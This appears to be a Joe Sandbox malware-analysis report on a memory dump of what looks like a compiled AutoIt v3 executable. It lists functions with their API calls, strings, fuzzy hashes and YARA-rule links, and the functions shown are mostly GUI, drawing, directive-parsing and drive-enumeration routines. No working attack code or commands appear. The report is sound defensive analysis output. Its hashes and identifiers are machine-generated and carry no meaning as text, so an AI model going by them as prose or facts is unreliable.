Instruction ID: adedec26e3fa1780c0a14f3631b2b4ec875d303e0b779b76179b200ef6cb5c07
Opcode Fuzzy Hash: a288b8c74f40368d64a18058de83e15fcfb0e1cf34a2ef2f788ce853866e5377
Instruction Fuzzy Hash: 2A028C71910209EFDB14DF68CD89EAF7BB9EF48310F148559F915AB2A1CB70AD02DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F53BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00F60980), ref: 00F53C65
IsWindowVisible.USER32(?), ref: 00F53C89

Strings

FINDSTRING, xrefs: 00F53DB4
GETLINECOUNT, xrefs: 00F53F04
TABRIGHT, xrefs: 00F53CDB
ADDSTRING, xrefs: 00F53D54
SENDCOMMANDID, xrefs: 00F54018
EDITPASTE, xrefs: 00F53F9D
GETCURRENTCOL, xrefs: 00F53F66
ISVISIBLE, xrefs: 00F53C75
ISENABLED, xrefs: 00F53CA9
CHECK, xrefs: 00F53EAB
HIDEDROPDOWN, xrefs: 00F53D3E
SHOWDROPDOWN, xrefs: 00F53D1E
GETCURRENTLINE, xrefs: 00F53F2B
GETCURRENTSELECTION, xrefs: 00F53E21
GETLINE, xrefs: 00F53FD9
SETCURRENTSELECTION, xrefs: 00F53DF4
GETSELECTED, xrefs: 00F53EE1
ISCHECKED, xrefs: 00F53E77
DELSTRING, xrefs: 00F53D87
SELECTSTRING, xrefs: 00F53E44
UNCHECK, xrefs: 00F53EC1
TABLEFT, xrefs: 00F53CC5
CURRENTTAB, xrefs: 00F53CFB

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 3f01d6beeee11e6d4eb11951bf927baed772b53eb4c246a6c040ac8f1e5fac14
Instruction ID: 0a992124115bc01f67e1c555ad253e40c8b28ca7676701f72b8ab3a6c80eba56
Opcode Fuzzy Hash: 3f01d6beeee11e6d4eb11951bf927baed772b53eb4c246a6c040ac8f1e5fac14
Instruction Fuzzy Hash: A5D183302042158BCB14EF14D851AAAB7E1EF94395F204458FE566B3E3CB36ED4EEB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F5ABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00F5AC55
GetSysColorBrush.USER32(0000000F), ref: 00F5AC86
GetSysColor.USER32(0000000F), ref: 00F5AC92
SetBkColor.GDI32(?,000000FF), ref: 00F5ACAC
SelectObject.GDI32(?,?), ref: 00F5ACBB
InflateRect.USER32(?,000000FF,000000FF), ref: 00F5ACE6
GetSysColor.USER32(00000010), ref: 00F5ACEE
CreateSolidBrush.GDI32(00000000), ref: 00F5ACF5
FrameRect.USER32 ref: 00F5AD04
DeleteObject.GDI32(00000000), ref: 00F5AD0B
InflateRect.USER32(?,000000FE,000000FE), ref: 00F5AD56
FillRect.USER32 ref: 00F5AD88
GetWindowLongW.USER32(?,000000F0), ref: 00F5ADB3

Part of subcall function 00F5AF18: GetSysColor.USER32(00000012), ref: 00F5AF51
Part of subcall function 00F5AF18: SetTextColor.GDI32(?,?), ref: 00F5AF55
Part of subcall function 00F5AF18: GetSysColorBrush.USER32(0000000F), ref: 00F5AF6B
Part of subcall function 00F5AF18: GetSysColor.USER32(0000000F), ref: 00F5AF76
Part of subcall function 00F5AF18: GetSysColor.USER32(00000011), ref: 00F5AF93
Part of subcall function 00F5AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F5AFA1
Part of subcall function 00F5AF18: SelectObject.GDI32(?,00000000), ref: 00F5AFB2
Part of subcall function 00F5AF18: SetBkColor.GDI32(?,00000000), ref: 00F5AFBB
Part of subcall function 00F5AF18: SelectObject.GDI32(?,?), ref: 00F5AFC8
Part of subcall function 00F5AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00F5AFE7
Part of subcall function 00F5AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F5AFFE
Part of subcall function 00F5AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00F5B013

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 6762bf8bbc30191d429340b83fbf0373573917b1cc50702296ada67f611e9793
Instruction ID: 36d630922aef2bdbaa6f74cdee10461bc71fd89055ad61862f5c639334878bb5
Opcode Fuzzy Hash: 6762bf8bbc30191d429340b83fbf0373573917b1cc50702296ada67f611e9793
Instruction Fuzzy Hash: F4A18172408305BFD7119F64DC08A6B7BA9FF49322F240B19FA62961A0DBB1D854EF52

Uniqueness

Uniqueness Score: -1.00%

Function 00ED2FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00ED3072
DeleteObject.GDI32(00000000), ref: 00ED30B8
DeleteObject.GDI32(00000000), ref: 00ED30C3
DestroyIcon.USER32(00000000,?,?,?), ref: 00ED30CE
DestroyWindow.USER32(00000000,?,?,?), ref: 00ED30D9
SendMessageW.USER32(?,00001308,?,00000000), ref: 00F0C77C
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F0C7B5
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F0CBDE

Part of subcall function 00ED1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00ED2412,?,00000000,?,?,?,?,00ED1AA7,00000000,?), ref: 00ED1F76

SendMessageW.USER32(?,00001053), ref: 00F0CC1B
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F0CC32
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00F0CC48
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00F0CC53

Strings

0, xrefs: 00F0CA72

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 2ad1321d0f69c87df109b186ff121becc8ff2b1f00f56be8b7702bf533426129
Instruction ID: ed5bf8fe971cfceaa2f3da0829e827499cafee6132f4b1edf53f061477a08d04
Opcode Fuzzy Hash: 2ad1321d0f69c87df109b186ff121becc8ff2b1f00f56be8b7702bf533426129
Instruction Fuzzy Hash: A2129170604201EFDB14DF24C894BA6B7E1FF44310F14866AF555DB2A2C771ED46EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EE27FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 00EF0FE6: std::exception::exception.LIBCMT ref: 00EF101C
Part of subcall function 00EF0FE6: __CxxThrowException@8.LIBCMT ref: 00EF1031

__wcsnicmp.LIBCMT ref: 00EE286A
__wcsnicmp.LIBCMT ref: 00EE287E
__wcsnicmp.LIBCMT ref: 00EE2896
__wcsnicmp.LIBCMT ref: 00EE28AE
__wcsnicmp.LIBCMT ref: 00EE28C6
__wcsnicmp.LIBCMT ref: 00EE28DE
__wcsnicmp.LIBCMT ref: 00EE28F6
__wcsnicmp.LIBCMT ref: 00EE290A
__wcsnicmp.LIBCMT ref: 00EE2948
__wcsnicmp.LIBCMT ref: 00EE295C
__wcsnicmp.LIBCMT ref: 00EE2970
__wcsnicmp.LIBCMT ref: 00EE2984

Strings

Unterminated group of comments, xrefs: 00F1FCFA
#OnAutoItStartRegister, xrefs: 00EE28A8
#include-once, xrefs: 00EE28C0
#include, xrefs: 00EE28D8
#cs, xrefs: 00EE2904, 00EE2956
#comments-end, xrefs: 00EE296A
#requireadmin, xrefs: 00EE2890
Cannot parse #include, xrefs: 00F1FCE5
Bad directive syntax error, xrefs: 00F1FBD3, 00F1FBF0
#notrayicon, xrefs: 00EE2878
#pragma compile, xrefs: 00EE2864
', xrefs: 00F1FB9F
", xrefs: 00F1FB89
#ce, xrefs: 00EE297E
#comments-start, xrefs: 00EE28F0, 00EE2942

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 2660009612-1645009161
Opcode ID: 7751e8ff9d63e72466f41864767d658d085ceb67adca915ecdb458acd0b17483
Instruction ID: eb2843477dbc1b3abfe538e950dc76c14f4f896e3a33066ff33abccf8a929e73
Opcode Fuzzy Hash: 7751e8ff9d63e72466f41864767d658d085ceb67adca915ecdb458acd0b17483
Instruction Fuzzy Hash: 94A19F31A0024DABCB14AF22DC42EBE77B8AF44740F14506DFA05BB292EBB1DA45E751

Uniqueness

Uniqueness Score: -1.00%

Function 00F47B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00F47BC8
SystemParametersInfoW.USER32 ref: 00F47C87
SetRect.USER32 ref: 00F47CC5
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00F47CD7
CreateWindowExW.USER32 ref: 00F47D1D
GetClientRect.USER32(00000000,?), ref: 00F47D29
CreateWindowExW.USER32 ref: 00F47D6D
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F47D7C
GetStockObject.GDI32(00000011), ref: 00F47D8C
SelectObject.GDI32(00000000,00000000), ref: 00F47D90
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00F47DA0
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F47DA9
DeleteDC.GDI32(00000000), ref: 00F47DB2
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?,?,50000000), ref: 00F47DDE
SendMessageW.USER32(00000030,00000000,00000001), ref: 00F47DF5
CreateWindowExW.USER32 ref: 00F47E30
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F47E44
SendMessageW.USER32(00000404,00000001,00000000), ref: 00F47E55
CreateWindowExW.USER32 ref: 00F47E85
GetStockObject.GDI32(00000011), ref: 00F47E90
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F47E9B
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00F47EA5

Strings

DISPLAY, xrefs: 00F47D72
static, xrefs: 00F47D67, 00F47E7F
AutoIt v3, xrefs: 00F47D15
msctls_progress32, xrefs: 00F47E26

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: fa3257d8c5c6b808eb55e3c57ef933ecf1a70cd8f9e8c6d0d8e3198706bb3fb6
Instruction ID: cdac649467a9cbe25a1c45ee2b74eebe466888c6c91bfd890ce6c22165052ad4
Opcode Fuzzy Hash: fa3257d8c5c6b808eb55e3c57ef933ecf1a70cd8f9e8c6d0d8e3198706bb3fb6
Instruction Fuzzy Hash: CBA170B1A10219BFEB14DBA4DD4AFAF7BA9EB04710F144115FA15A72E0CBB0AD01DF64

Uniqueness

Uniqueness Score: -1.00%

Function 00F3B353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F3B361
GetDriveTypeW.KERNEL32(?,00F62C4C,?,\\.\,00F60980), ref: 00F3B43E
SetErrorMode.KERNEL32(00000000,00F62C4C,?,\\.\,00F60980), ref: 00F3B59C

Strings

PhysicalDrive, xrefs: 00F3B3EA
FileBackedVirtual, xrefs: 00F3B56B
SAS, xrefs: 00F3B548
CDROM, xrefs: 00F3B472
RAMDisk, xrefs: 00F3B468
Network, xrefs: 00F3B47C
RAID, xrefs: 00F3B53A
Fixed, xrefs: 00F3B486
SSA, xrefs: 00F3B525
SCSI, xrefs: 00F3B509
MMC, xrefs: 00F3B55D
\\.\, xrefs: 00F3B3B3
ATA, xrefs: 00F3B517
ATAPI, xrefs: 00F3B510
SATA, xrefs: 00F3B54F
Fibre, xrefs: 00F3B52C
Removable, xrefs: 00F3B490
SSD, xrefs: 00F3B4C9
Unknown, xrefs: 00F3B45E, 00F3B502
1394, xrefs: 00F3B51E
iSCSI, xrefs: 00F3B541
Virtual, xrefs: 00F3B564
USB, xrefs: 00F3B533

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 6db32210f20bccdaf7334eb3991dbd1f3d783405ca3812fae379aa25a59a72e4
Instruction ID: 1dc8f4ac54cc848610308799c18cd116831f780185a8f074b1a8bb033ca02aab
Opcode Fuzzy Hash: 6db32210f20bccdaf7334eb3991dbd1f3d783405ca3812fae379aa25a59a72e4
Instruction Fuzzy Hash: 8951B432B4020DEBCB40EB20C963ABD77E1AF44760F284056E606B7291E775EE41FB56

Uniqueness

Uniqueness Score: -1.00%

Function 00F5A041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00F5A0F7
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00F5A1B0
SendMessageW.USER32(?,00001102,00000002,?), ref: 00F5A1CC

Strings

0, xrefs: 00F5A209

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 1aa430ff79a3f27c12d3b00f50801e8362f8ff057c13e4dff2c21b63e29ba081
Instruction ID: c37059a30d9c17410a75a85e273091ce46098925f9eb3e8b0a207ef26940406c
Opcode Fuzzy Hash: 1aa430ff79a3f27c12d3b00f50801e8362f8ff057c13e4dff2c21b63e29ba081
Instruction Fuzzy Hash: 58020030508301AFDB15CF14C848FAABBE4FF84326F18861DFA95972A1D775D868EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F5AF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00F5AF51
SetTextColor.GDI32(?,?), ref: 00F5AF55
GetSysColorBrush.USER32(0000000F), ref: 00F5AF6B
GetSysColor.USER32(0000000F), ref: 00F5AF76
CreateSolidBrush.GDI32(?), ref: 00F5AF7B
GetSysColor.USER32(00000011), ref: 00F5AF93
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F5AFA1
SelectObject.GDI32(?,00000000), ref: 00F5AFB2
SetBkColor.GDI32(?,00000000), ref: 00F5AFBB
SelectObject.GDI32(?,?), ref: 00F5AFC8
InflateRect.USER32(?,000000FF,000000FF), ref: 00F5AFE7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F5AFFE
GetWindowLongW.USER32(00000000,000000F0), ref: 00F5B013
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F5B05F
GetWindowTextW.USER32 ref: 00F5B086
InflateRect.USER32(?,000000FD,000000FD), ref: 00F5B0A4
DrawFocusRect.USER32 ref: 00F5B0AF
GetSysColor.USER32(00000011), ref: 00F5B0BD
SetTextColor.GDI32(?,00000000), ref: 00F5B0C5
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F5B0D9
SelectObject.GDI32(?,00F5AC1F), ref: 00F5B0F0
DeleteObject.GDI32(?), ref: 00F5B0FB
SelectObject.GDI32(?,?), ref: 00F5B101
DeleteObject.GDI32(?), ref: 00F5B106
SetTextColor.GDI32(?,?), ref: 00F5B10C
SetBkColor.GDI32(?,?), ref: 00F5B116

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 6dcaf9cb80dd477287ba0179f329a3ef898183e5b175c1423740e1a9aae7bfca
Instruction ID: b9eec1f0fdba008bdaebb61562e04b3fd21a82ce4d141aedfa5e9931637aedcf
Opcode Fuzzy Hash: 6dcaf9cb80dd477287ba0179f329a3ef898183e5b175c1423740e1a9aae7bfca
Instruction Fuzzy Hash: 19615271900218BFDF119FA4DC48AAF7B79EF08321F244515FA25AB2A1DBB19D40EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00F58FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F590EA
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F590FB
CharNextW.USER32(0000014E), ref: 00F5912A
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F5916B
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F59181
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F59192
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F591AF
SetWindowTextW.USER32(?,0000014E), ref: 00F591FB
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F59211
SendMessageW.USER32(?,00001002,00000000,?), ref: 00F59242
_memset.LIBCMT ref: 00F59267
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F592B0
_memset.LIBCMT ref: 00F5930F
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F59339
SendMessageW.USER32(?,00001074,?,00000001), ref: 00F59391
SendMessageW.USER32(?,0000133D,?,?), ref: 00F5943E
InvalidateRect.USER32(?,00000000,00000001), ref: 00F59460
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F594AA
SetMenuItemInfoW.USER32 ref: 00F594D7
DrawMenuBar.USER32(?), ref: 00F594E6
SetWindowTextW.USER32(?,0000014E), ref: 00F5950E

Strings

0, xrefs: 00F59478

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: ac8cb4ac8dc96c7e2476e58903c5c8512fad395df891de33aa41d96ed72fd280
Instruction ID: 7970e6b2ce2c968838d237752092c26bd3d7a32f2879b066c3751183626218dd
Opcode Fuzzy Hash: ac8cb4ac8dc96c7e2476e58903c5c8512fad395df891de33aa41d96ed72fd280
Instruction Fuzzy Hash: 77E1B371904208EFDF259F60CC84EEE7BB8EF05721F144156FE15AA291DBB08A85EF61

Uniqueness

Uniqueness Score: -1.00%

Function 00F54ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00F55007
GetDesktopWindow.USER32 ref: 00F5501C
GetWindowRect.USER32 ref: 00F55023
GetWindowLongW.USER32(?,000000F0), ref: 00F55085
DestroyWindow.USER32(?), ref: 00F550B1
CreateWindowExW.USER32 ref: 00F550DA
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F550F8
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F5511E
SendMessageW.USER32(?,00000421,?,?), ref: 00F55133
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F55146
IsWindowVisible.USER32(?), ref: 00F55166
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F55181
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F55195
GetWindowRect.USER32 ref: 00F551AD
MonitorFromPoint.USER32(?,?,00000002), ref: 00F551D3
GetMonitorInfoW.USER32 ref: 00F551ED
CopyRect.USER32 ref: 00F55204
SendMessageW.USER32(?,00000412,00000000), ref: 00F5526F

Strings

0, xrefs: 00F54FB2
(, xrefs: 00F551E0
tooltips_class32, xrefs: 00F550D3

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: dfc0a747ece05016e8388426aa40e5d01097ce6ddcdd7004a64788e9bcd53aa0
Instruction ID: 8ca1b41a91f4d405f59240d58dbff4756ac7978d1678e6541f1c5f8d34b81743
Opcode Fuzzy Hash: dfc0a747ece05016e8388426aa40e5d01097ce6ddcdd7004a64788e9bcd53aa0
Instruction Fuzzy Hash: 5CB18B71604701AFDB04DF64C954B6BBBE4FF88710F00891DFA99AB291DB71E809DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F3498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00F3499C
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00F349C2
_wcscpy.LIBCMT ref: 00F349F0
_wcscmp.LIBCMT ref: 00F349FB
_wcscat.LIBCMT ref: 00F34A11
_wcsstr.LIBCMT ref: 00F34A1C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00F34A38
_wcscat.LIBCMT ref: 00F34A81
_wcscat.LIBCMT ref: 00F34A88
_wcsncpy.LIBCMT ref: 00F34AB3

Strings

%u.%u.%u.%u, xrefs: 00F34B16
\VarFileInfo\Translation, xrefs: 00F34A30
StringFileInfo\, xrefs: 00F34A0B
DefaultLangCodepage, xrefs: 00F34A9B
04090000, xrefs: 00F34A6E

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
